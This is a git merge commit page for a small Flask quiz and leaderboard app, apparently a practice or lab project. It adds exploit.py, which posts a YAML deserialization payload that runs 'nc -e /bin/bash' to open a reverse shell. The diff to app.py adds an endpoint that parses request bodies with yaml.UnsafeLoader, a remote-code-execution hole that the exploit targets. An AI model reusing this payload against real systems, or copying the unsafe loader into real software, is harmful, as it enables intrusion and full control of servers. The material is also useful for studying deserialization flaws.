furtest/tigrou
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'main' into yoyo

Browse Source
This commit is contained in:
Yoan Guerin
2025-12-05 05:53:51 +01:00
parent 22cb8ef30d a121c472db
commit 20be83aa3c
3 changed files with 27 additions and 6 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
.gitignore vendored Normal file
View File

@@ -0,0 +1 @@
leaderboard.yaml

11
exploit.py Normal file
View File

@@ -0,0 +1,11 @@
import requests
malicious_yaml = """
!!python/object/apply:os.system ["nc -e /bin/bash 127.0.0.1 1111"]
"""
url = "http://127.0.0.1:8080/api/leaderboard"
headers = {
"Content-Type": "text/yaml"
}
response = requests.post(url, headers=headers, data=malicious_yaml)
print(response.text)

19
flask_base/app.py
View File

@@ -13,17 +13,27 @@ if not os.path.exists(LEADERBOARD_FILE):
def read_leaderboard(): def read_leaderboard():
with open(LEADERBOARD_FILE, 'r') as f: with open(LEADERBOARD_FILE, 'r') as f:
return yaml.load(f, Loader=yaml.UnsafeLoader) or [] return yaml.safe_load(f) or []
def write_leaderboard(data): def write_leaderboard(data):
print(data)
with open(LEADERBOARD_FILE, 'w') as f: with open(LEADERBOARD_FILE, 'w') as f:
yaml.safe_dump(data, f) yaml.safe_dump(data, f)
@app.route('/api/leaderboard', methods=['POST']) @app.route('/api/leaderboard', methods=['POST'])
def add_to_leaderboard(): def add_to_leaderboard():
if request.content_type == 'text/yaml' or request.content_type == 'application/yaml':
try:
new_entry = yaml.load(request.data, Loader=yaml.UnsafeLoader)
except yaml.YAMLError:
return jsonify({'error': 'Invalid YAML format'}), 400
else:
new_entry = request.json new_entry = request.json
print(new_entry)
if not new_entry or 'name' not in new_entry or 'score' not in new_entry: if not new_entry or 'name' not in new_entry or 'score' not in new_entry:
return jsonify({'error': 'Name and score are required'}), 400 return jsonify({'error': 'Name and score are required'}), 400
leaderboard = read_leaderboard() leaderboard = read_leaderboard()
leaderboard.append(new_entry) leaderboard.append(new_entry)
write_leaderboard(leaderboard) write_leaderboard(leaderboard)
@@ -38,19 +48,18 @@ def get_leaderboard():
@app.route('/questions') @app.route('/questions')
def show_questions(): def show_questions():
with open('./data/quizz.json', 'r') as file: with open('./data/quizz.json', 'r') as file:
#questions = json.load(file)["outils_list"]
questions = json.load(file) questions = json.load(file)
return render_template('quiz.html', questions=questions) return render_template('quiz.html', questions=questions)
@app.route('/') @app.route('/')
def main(): def main():
return render_template('index.html') return render_template('index.html')
@app.route('/pokemon') @app.route('/pokemon')
def poke(): def poke():
return render_template('pokemon.html') with open('./data/softwares.json', 'r') as file:
softwares = json.load(file)["outils_list"]
return render_template('pokemon.html', data=softwares)
@app.route('/PAI') @app.route('/PAI')
def pai(): def pai():